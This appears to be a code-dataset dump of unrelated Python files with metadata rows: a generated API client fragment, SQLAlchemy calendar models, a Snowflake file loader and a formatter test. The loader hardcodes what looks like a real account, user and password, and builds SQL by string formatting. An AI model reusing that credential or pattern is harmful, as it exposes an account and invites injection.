are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
kwargs['set_admin_level_dto'] = \
set_admin_level_dto
return self.users_controller_set_admin_level_endpoint.call_with_http_info(**kwargs)
| 35.967115
| 98
| 0.512385
| 2,327
| 24,062
| 5.039106
| 0.088956
| 0.034539
| 0.022173
| 0.023026
| 0.882654
| 0.852123
| 0.839843
| 0.814003
| 0.805219
| 0.790551
| 0
| 0.002875
| 0.407281
| 24,062
| 668
| 99
| 36.020958
| 0.81931
| 0.389618
| 0
| 0.622066
| 1
| 0
| 0.2285
| 0.054132
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0.021127
| 0
| 0.049296
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7871513213a8e46582179f91a12da0691bb9ada6
| 2,705
|
py
|
Python
|
models/text.py
|
pranjal-mittal0/life-calendar
|
72a651259561007fccea948879894f415ca8ccbe
|
[
"MIT"
] | 50
|
2020-09-29T17:11:10.000Z
|
2021-11-15T11:46:10.000Z
|
models/text.py
|
pranjal-mittal0/life-calendar
|
72a651259561007fccea948879894f415ca8ccbe
|
[
"MIT"
] | 1
|
2021-04-12T15:50:17.000Z
|
2021-08-20T15:13:21.000Z
|
models/text.py
|
pranjal-mittal0/life-calendar
|
72a651259561007fccea948879894f415ca8ccbe
|
[
"MIT"
] | 2
|
2020-10-05T21:10:24.000Z
|
2020-10-06T09:29:43.000Z
|
from models.user import db
class Day(db.Model):
__tablename__ = "day"
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.Integer)
textcontent = db.Column(db.Text)
number = db.Column(db.Integer, unique=True)
colors = db.Column(db.Text)
# connect day to user
user_email = db.Column(db.Text, db.ForeignKey("users.email"))
def __init__(self, textcontent, user_email, number, colors):
self.textcontent = textcontent
self.user_email = user_email
self.number = number
self.colors = colors
class Week(db.Model):
__tablename__ = "week"
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.Integer)
textcontent = db.Column(db.Text)
colors = db.Column(db.Text)
# connect day to user
user_email = db.Column(db.Text, db.ForeignKey("users.email"))
def __init__(self, textcontent, user_email, number, colors):
self.textcontent = textcontent
self.user_email = user_email
self.number = number
self.colors = colors
class Month(db.Model):
__tablename__ = "month"
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.Integer)
textcontent = db.Column(db.Text)
colors = db.Column(db.Text)
# connect day to user
user_email = db.Column(db.Text, db.ForeignKey("users.email"))
def __init__(self, textcontent, user_email, number, colors):
self.textcontent = textcontent
self.user_email = user_email
self.number = number
self.colors = colors
class Year(db.Model):
__tablename__ = "year"
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.Integer)
textcontent = db.Column(db.Text)
colors = db.Column(db.Text)
# connect day to user
user_email = db.Column(db.Text, db.ForeignKey("users.email"))
def __init__(self, textcontent, user_email, number, colors):
self.textcontent = textcontent
self.user_email = user_email
self.number = number
self.colors = colors
def __repr__(self):
return f"Year {self.number} -- {self.textcontent}"
class Decade(db.Model):
__tablename__ = "decade"
id = db.Column(db.Integer, primary_key=True)
number = db.Column(db.Integer)
textcontent = db.Column(db.Text)
colors = db.Column(db.Text)
# connect day to user
user_email = db.Column(db.Text, db.ForeignKey("users.email"))
def __init__(self, textcontent, user_email, number, colors):
self.textcontent = textcontent
self.user_email = user_email
self.number = number
self.colors = colors
def __repr__(self):
return self.textcontent
| 28.776596
| 65
| 0.65841
| 353
| 2,705
| 4.838527
| 0.09915
| 0.12178
| 0.152225
| 0.122951
| 0.876464
| 0.862998
| 0.862998
| 0.862998
| 0.862998
| 0.862998
| 0
| 0
| 0.226987
| 2,705
| 93
| 66
| 29.086022
| 0.816834
| 0.036599
| 0
| 0.787879
| 0
| 0
| 0.045
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106061
| false
| 0
| 0.015152
| 0.030303
| 0.69697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
78801da06054edd6c91e0210bcb314fb0e21f262
| 18,788
|
py
|
Python
|
SnowPype.py
|
Data-Alchemy/Snowflake
|
d7789200c68304d617e6905d180ebc4878558936
|
[
"Apache-2.0"
] | null | null | null |
SnowPype.py
|
Data-Alchemy/Snowflake
|
d7789200c68304d617e6905d180ebc4878558936
|
[
"Apache-2.0"
] | null | null | null |
SnowPype.py
|
Data-Alchemy/Snowflake
|
d7789200c68304d617e6905d180ebc4878558936
|
[
"Apache-2.0"
] | null | null | null |
import snowflake.connector
from snowflake.connector.pandas_tools import write_pandas
from snowflake.connector.pandas_tools import pd_writer
import pandas as pd
import os
import datetime
import re
###########################################################################
########################## Pandas Settings ################################
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth',None)
###########################################################################
class SnowPipe():
def __init__(self,org,warehouse,usr,pwd,role,database,schema=None):
self.org = org
self.warehouse = warehouse
self.usr = usr
self.pwd = pwd
self.role = role
self.database = database
self.schema = schema
@property
def Validate_Parms(self):
return {'org' : self.org,
'usr' : self.usr,
'warehouse' : self.warehouse,
'pwd' : self.pwd,
'role' : self.role,
'database' : self.database,
'schema' : self.schema,
}
@property
def Connection_Cursor(self) -> snowflake.connector.connect:
try:
ctx = snowflake.connector.connect(
user =self.usr,
password =self.pwd,
account =self.org
)
return ctx
except Exception as e:
print(f"connection to Snowflake failed \n Error received {e}:")
def SnowPy(self,file_type: str):
self.file_type = file_type
if self.file_type not in ['csv','json','parquet']:
print('invalid file type specified please use one of the following "csv","json","parquet"')
exit(-1)
if self.file_type == 'csv':
self.dirname = '../Upload/csv/'
self.full_path = os.path.abspath(self.dirname)
self.dirfiles = os.listdir(self.dirname)
self.fullpaths = map(lambda name: os.path.join(self.full_path,name), self.dirfiles)
self.file_list = [file for file in self.fullpaths if os.path.isfile(file)]
for file in self.file_list:
self.file_name = str(os.path.basename(file))
self.file_type = self.file_name.split('.')[1]
if self.file_type != 'csv':
print('Error wrong file type added to this folder please add only csv files to this directory')
exit(-1)
else:
self.table_name = re.sub("[^0-9a-zA-Z$]+","_",self.file_name.upper().split('.')[0])
self.df = pd.read_csv(file)
self.df.columns = self.df.columns.str.replace("[^0-9a-zA-Z$]+","_",regex=True)
self.df.columns = [c.upper() for c in self.df.columns]
self.df['LOAD_DATE'] = datetime.datetime.strftime(datetime.datetime.now(), '%Y/%m/%d %H:%M:%S %p')
self.df['FILE_NAME'] = os.path.basename(file)
#print(self.df.head(1))
self.ddl = pd.io.sql.get_schema(self.df,self.table_name).replace('"','')
self.table_cursor= self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE DATABASE {self.database};
SHOW TABLES
''',remove_comments=True)
self.df_table_list = pd.DataFrame(self.table_cursor[-1])
self.filter = self.df_table_list[1] == self.table_name
self.df_table_list = self.df_table_list[self.filter]
if self.df_table_list.empty:
print(f'Table does not exist creating new table {self.table_name}')
self.create_table = self.Connection_Cursor.execute_string(f"""
USE ROLE {self.role};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.ddl};""")
for c in self.create_table:
for row in c:
print(row)
# generating insert statement guarantees data accuracy #
self.df['col'] = '("'+'","'.join([str(i) for i in self.df.columns.tolist()])+'")'
self.df['values'] = self.df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'",'') ,axis =1 )
self.df['insert'] = self.df.apply(lambda x: f'INSERT INTO {self.database}.{self.schema}.{self.table_name} { x["col"]} VALUES {x["values"]};',axis =1)
self.insert_df = self.df['insert']
self.insert_statement = self.insert_df.to_string(index=False)
print(self.insert_statement)
self.insert_into = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE WAREHOUSE {self.warehouse};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.insert_statement}
''')
for c in self.insert_into:
for row in c:
print(row)
else:
print(f'Table exists loading data into existing table {self.table_name}')
# generating insert statement guarantees data accuracy #
self.df['col'] = '("' + '","'.join([str(i) for i in self.df.columns.tolist()]) + '")'
self.df['values'] = self.df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'", ''),axis=1)
self.df['insert'] = self.df.apply(lambda x: f'INSERT INTO {self.database}.{self.schema}.{self.table_name} {x["col"]} VALUES {x["values"]};', axis=1)
self.insert_df = self.df['insert']
self.insert_statement = self.insert_df.to_string(index=False)
#print(self.insert_statement)
self.insert_into = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE WAREHOUSE {self.warehouse};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.insert_statement}
''')
for c in self.insert_into:
for row in c:
print(row)
########################################################################################################################
if self.file_type == 'json':
self.dirname = '../Upload/json/'
self.dirfiles = os.listdir(self.dirname)
self.fullpaths = map(lambda name: os.path.join(self.full_path,name), self.dirfiles)
self.file_list = [file for file in self.fullpaths if os.path.isfile(file)]
for file in self.file_list:
self.file_name = str(os.path.basename(file))
self.file_type = self.file_name.split('.')[1]
if self.file_type != 'json':
print('Error wrong file type added to this folder please add only csv files to this directory')
exit(-1)
else:
self.df = pd.read_json(file)
self.df.columns = self.df.columns.str.replace("[^0-9a-zA-Z$]+", "_", regex=True)
self.df.columns = [c.upper() for c in self.df.columns]
self.df['LOAD_DATE'] = datetime.datetime.strftime(datetime.datetime.now(), '%Y/%m/%d %H:%M:%S %p')
self.df['FILE_NAME'] = os.path.basename(file)
# print(self.df.head(1))
self.ddl = pd.io.sql.get_schema(self.df, self.table_name).replace('"', '')
self.table_cursor = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE DATABASE {self.database};
SHOW TABLES
''', remove_comments=True)
self.df_table_list = pd.DataFrame(self.table_cursor[-1])
self.filter = self.df_table_list[1] == self.table_name
self.df_table_list = self.df_table_list[self.filter]
if self.df_table_list.empty:
print(f'Table does not exist creating new table {self.table_name}')
self.create_table = self.Connection_Cursor.execute_string(f"""
USE ROLE {self.role};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.ddl};""")
for c in self.create_table:
for row in c:
print(row)
# generating insert statement guarantees data accuracy #
self.df['col'] = '("' + '","'.join([str(i) for i in self.df.columns.tolist()]) + '")'
self.df['values'] = self.df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'", ''),
axis=1)
self.df['insert'] = self.df.apply(lambda
x: f'INSERT INTO {self.database}.{self.schema}.{self.table_name} {x["col"]} VALUES {x["values"]};',
axis=1)
self.insert_df = self.df['insert']
self.insert_statement = self.insert_df.to_string(index=False)
self.insert_into = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE WAREHOUSE {self.warehouse};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.insert_statement}
''')
for c in self.insert_into:
for row in c:
print(row)
else:
print(f'Table exists loading data into existing table {self.table_name}')
# generating insert statement guarantees data accuracy #
self.df['col'] = '("' + '","'.join([str(i) for i in self.df.columns.tolist()]) + '")'
self.df['values'] = self.df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'", ''),
axis=1)
self.df['insert'] = self.df.apply(lambda
x: f'INSERT INTO {self.database}.{self.schema}.{self.table_name} {x["col"]} VALUES {x["values"]};',
axis=1)
self.insert_df = self.df['insert']
self.insert_statement = self.insert_df.to_string(index=False)
# print(self.insert_statement)
self.insert_into = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE WAREHOUSE {self.warehouse};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.insert_statement}
''')
for c in self.insert_into:
for row in c:
print(row)
########################################################################################################################
if self.file_type == 'parquet':
self.full_path = os.path.abspath('../Upload/parquet/')
self.dirname = '../Upload/csv/'
self.dirfiles = os.listdir(self.dirname)
self.fullpaths = map(lambda name : os.path.join(self.full_path,name), self.dirfiles)
self.file_list = [file for file in self.fullpaths if os.path.isfile(file)]
for file in self.file_list:
self.file_name = str(os.path.basename(file))
self.file_type = self.file_name.split('.')[1]
if self.file_type != 'parquet':
print('Error wrong file type added to this folder please add only csv files to this directory')
exit(-1)
else:
self.df = pd.read_parquet(file)
self.df.columns = self.df.columns.str.replace("[^0-9a-zA-Z$]+", "_", regex=True)
self.df.columns = [c.upper() for c in self.df.columns]
self.df['LOAD_DATE'] = datetime.datetime.strftime(datetime.datetime.now(), '%Y/%m/%d %H:%M:%S %p')
self.df['FILE_NAME'] = os.path.basename(file)
# print(self.df.head(1))
self.ddl = pd.io.sql.get_schema(self.df, self.table_name).replace('"', '')
self.table_cursor = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE DATABASE {self.database};
SHOW TABLES
''', remove_comments=True)
self.df_table_list = pd.DataFrame(self.table_cursor[-1])
self.filter = self.df_table_list[1] == self.table_name
self.df_table_list = self.df_table_list[self.filter]
if self.df_table_list.empty:
print(f'Table does not exist creating new table {self.table_name}')
self.create_table = self.Connection_Cursor.execute_string(f"""
USE ROLE {self.role};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.ddl};""")
for c in self.create_table:
for row in c:
print(row)
# generating insert statement guarantees data accuracy #
self.df['col'] = '("' + '","'.join([str(i) for i in self.df.columns.tolist()]) + '")'
self.df['values'] = self.df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'", ''),
axis=1)
self.df['insert'] = self.df.apply(lambda
x: f'INSERT INTO {self.database}.{self.schema}.{self.table_name} {x["col"]} VALUES {x["values"]};',
axis=1)
self.insert_df = self.df['insert']
self.insert_statement = self.insert_df.to_string(index=False)
self.insert_into = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE WAREHOUSE {self.warehouse};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.insert_statement}
''')
for c in self.insert_into:
for row in c:
print(row)
else:
print(f'Table exists loading data into existing table {self.table_name}')
# generating insert statement guarantees data accuracy #
self.df['col'] = '("' + '","'.join([str(i) for i in self.df.columns.tolist()]) + '")'
self.df['values'] = self.df.apply(lambda x: str(tuple(x)).replace(f", '{x['col']}'", ''),
axis=1)
self.df['insert'] = self.df.apply(lambda
x: f'INSERT INTO {self.database}.{self.schema}.{self.table_name} {x["col"]} VALUES {x["values"]};',
axis=1)
self.insert_df = self.df['insert']
self.insert_statement = self.insert_df.to_string(index=False)
# print(self.insert_statement)
self.insert_into = self.Connection_Cursor.execute_string(f'''
USE ROLE {self.role};
USE WAREHOUSE {self.warehouse};
USE DATABASE {self.database};
USE SCHEMA {self.schema};
{self.insert_statement}
''')
for c in self.insert_into:
for row in c:
print(row)
SnowPipe(org='hwlesra-retailpnimedia',usr='SYS_USER',pwd='5bf452afbaa43e8b57ed8058b2adf3fc',role="PROD_BRONZE_DB_ROOT",database="PROD_BRONZE_DB",schema="STAGING",warehouse="PROD_ANALYTICS_WH").SnowPy("csv")
| 52.480447
| 206
| 0.429423
| 1,814
| 18,788
| 4.334068
| 0.097574
| 0.064106
| 0.031417
| 0.028619
| 0.865429
| 0.852073
| 0.826762
| 0.826762
| 0.826762
| 0.826762
| 0
| 0.004923
| 0.437779
| 18,788
| 357
| 207
| 52.627451
| 0.739373
| 0.026293
| 0
| 0.782772
| 0
| 0.022472
| 0.325461
| 0.027823
| 0.022472
| 0
| 0
| 0
| 0
| 1
| 0.014981
| false
| 0.003745
| 0.026217
| 0.003745
| 0.052434
| 0.078652
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
152610f981700cfe147078ac5e571f0ad359878c
| 85
|
py
|
Python
|
python/testData/formatter/continuationIndentBeforeFunctionArguments_after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/formatter/continuationIndentBeforeFunctionArguments_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/formatter/continuationIndentBeforeFunctionArguments_after.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
sum(
1,
2, 3,
5,
)
sum(
1,
2, 3,
5)
| 7.727273
| 13
| 0.164706
| 10
| 85
| 1.4
| 0.5
| 0.571429
| 0.714286
| 0.857143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.32
| 0.705882
| 85
| 10
| 14
| 8.5
| 0.24
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.